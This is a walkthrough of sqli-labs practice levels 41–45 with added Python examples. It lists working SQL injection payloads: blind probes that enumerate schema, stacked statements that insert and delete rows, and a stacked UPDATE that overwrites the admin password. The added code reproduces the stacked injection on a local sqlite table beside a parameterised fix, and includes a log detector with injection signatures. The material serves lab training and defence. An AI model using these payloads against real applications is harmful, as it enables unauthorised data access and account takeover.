SQL Lab (41~45) (continuous update later)
2022-07-07 12:24:00 【hcjtn】
(41~45)
sql-lab-41
Same as level 40: stacked injection combined with time-based blind injection. We found that the only difference is the way the parameter is closed.
Determine the table name: ?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q  (the first character is e)
Determine the column name: ?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q  (the first character is i)
Therefore, we try to insert a row with a stacked statement:
?id=1;insert into users(id,username,password) values(20,'hcjtn','1234')-- q
We can also try to modify the row we just inserted:
?id=1;update users set username='tn' where id=20-- q
Then try to delete it:
?id=1;delete from users where id=20-- q
sql-lab-42
Opening level 42, we found that its interface looks very much like the second-order injection level from before.
Back then we registered a new user and used second-order injection to pass the SQL in through that parameter, but this level does not let us create new users,
so we need to find its injection point on the login form: when we enter ' or 1=1 -- q in the password field,
we find that the injection point is the password field.
Therefore, we can use stacked injection to change the admin password.
Step one: determine the table names and column names.
Determine the table names:
' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
The tables found are emails, referers, uagents and users.
Determine the column names:
' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'-- q
users has three columns: id, username and password.
Then we use stacked injection to change the administrator password:
' ;update users set password='hcjtn' where username='admin'#-- q
Then enter admin with the password hcjtn, and we find the login succeeds.
sql-lab-43
The same first-stage injection point as sql-lab-42: when we enter ') or 1=1# in the password field we find the login succeeds, so the injection point is the password field.
The only difference between level 43 and level 42 is the closing method;
everything else is exactly the same.
First determine the table names and column names:
Determine the table names:
') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
Determine the column names:
') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'#
Use stacked injection to change the administrator password:
1');update users set password='hcjtn' where username='admin'#
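Why the stacked statements in levels 41 to 43 work, and what closes the hole, as an added Python example that is not the lab's or the author's code. It assumes an in-memory sqlite3 table in place of the lab's MySQL users table, executescript() in place of the multi-statement query API the vulnerable page uses, and the walkthrough's -- q comment ending rather than #, because SQLite has no # comments.

```python
import sqlite3

# Added example, not the lab's code. Assumptions: an in-memory sqlite3 table stands in for
# the lab's security.users table, and executescript() stands in for the multi-statement
# query API that lets a ';' inside user input start a second statement.
PAYLOAD = "';update users set password='hcjtn' where username='admin'-- q"  # level 42 payload


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("CREATE TABLE users (id INTEGER, username TEXT, password TEXT);"
                     "INSERT INTO users VALUES (1, 'admin', 'original');")
    return db


def admin_password(db):
    return db.execute("SELECT password FROM users WHERE username='admin'").fetchone()[0]


def login_vulnerable(db, username, password):
    # Concatenation plus a multi-statement executor: the payload's leading quote closes the
    # password literal, ';' starts an UPDATE, and '-- q' comments out the rest of the query.
    sql = (f"SELECT id FROM users WHERE username='{username}' "
           f"AND password='{password}' LIMIT 1")
    db.executescript(sql)          # the SELECT runs, then the injected UPDATE runs


def login_hardened(db, username, password):
    # Bound parameters: the payload is compared as a plain password value and matches
    # nothing; execute() would also refuse a string containing two statements.
    row = db.execute("SELECT id FROM users WHERE username=? AND password=? LIMIT 1",
                     (username, password)).fetchone()
    return row is not None


def demo():
    vuln = make_db()
    login_vulnerable(vuln, "admin", PAYLOAD)
    safe = make_db()
    logged_in = login_hardened(safe, "admin", PAYLOAD)
    return admin_password(vuln), logged_in, admin_password(safe)


if __name__ == "__main__":
    print(demo())  # ('hcjtn', False, 'original')
```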
sql-lab-44
It is the same interface yet again.
First find the injection point: when we enter ' or 1=1 -- q in the password field, we find the login succeeds.
Injection point: password
The difference between this level and level 42 is that this level shows no visible error message,
so we can only use Boolean-based blind injection:
Determine the database name:
'or (ascii(substr((database()),1,1)))=115#
This shows that the first character of the database name is s.
'or (ascii(substr((database()),2,1)))=101#
This shows that the second character of the database name is e.
Determine the table names:
'or (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101-- q
The tables found are emails, referers, uagents and users.
Determine the column names:
'and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)))=105-- q
users has three columns: id, username and password.
Then change the admin password:
';update users set password='hcjtn' where username='admin'#
Click to log in; boring.
sql-lab-45
The injection point is the password field: ') or 1=1 #
Use time-based blind injection.
Determine the database name: ')or if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q  (the first character is s)
Determine the table name: ')or if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q  (the first character is e)
Determine the column name: ')or if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q  (the first character is i)
Get the data: ')or (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)))=105-- q  (the first character is i)
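How a defender would spot the level 41, 44 and 45 probes in request logs, as an added Python example that is not part of the post. It runs over a few constructed log lines (client, path, URL-encoded parameter, response seconds, all made up here) and recovers which character position each probe tested and, for sleep()-based probes, whether the response time confirmed the guess.

```python
import re
from urllib.parse import unquote_plus

# Constructed request log (not from the post): client, path, URL-encoded parameter,
# response time in seconds. The parameter values are the walkthrough's own probes.
LOG = """\
10.0.0.5 /Less-41/ id=1%20and%20if((ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))=101),sleep(5),1)--%20q 5.02
10.0.0.5 /Less-44/ passwd=%27or%20(ascii(substr((database()),1,1)))=115%23 0.01
10.0.0.5 /Less-44/ passwd=%27or%20(ascii(substr((database()),2,1)))=101%23 0.01
10.0.0.5 /Less-45/ passwd=%27)or%20if((ascii(substr(database(),1,1))=115),sleep(5),1)--%20q 5.01
10.0.0.9 /Less-42/ passwd=%27%20;update%20users%20set%20password=%27hcjtn%27%20where%20username=%27admin%27%23--%20q 0.02
10.0.0.7 /Less-41/ id=1 0.01
"""

# Signatures for the techniques used in levels 41-45 (dict order decides the tag order).
SIGNS = {
    "time_blind":  re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "char_probe":  re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "stacked":     re.compile(r";\s*(?:insert|update|delete|drop)\b", re.I),
}
# "...,3,1))=101": the position being tested and the code point it is compared with
PROBE = re.compile(r",\s*(\d+)\s*,\s*1\s*\)+\s*=\s*(\d+)")
SLEEP = re.compile(r"sleep\s*\(\s*(\d+)\s*\)", re.I)


def classify(line):
    """Return a hit dict for a suspicious request line, or None for a clean one."""
    client, path, param, secs = line.split()
    value = unquote_plus(param.split("=", 1)[1])
    tags = [name for name, rx in SIGNS.items() if rx.search(value)]
    if not tags:
        return None
    hit = {"client": client, "path": path, "tags": tags}
    m = PROBE.search(value)
    if m:
        hit["position"], hit["char"] = int(m.group(1)), chr(int(m.group(2)))
        # a sleep()-based probe was answered 'true' if the response took at least that long;
        # a Boolean probe needs the response body, which this log does not carry
        s = SLEEP.search(value)
        hit["true"] = float(secs) >= int(s.group(1)) if s else None
    return hit


def scan(log=LOG):
    return [h for h in (classify(ln) for ln in log.splitlines()) if h]


if __name__ == "__main__":
    for h in scan():
        print(h)
```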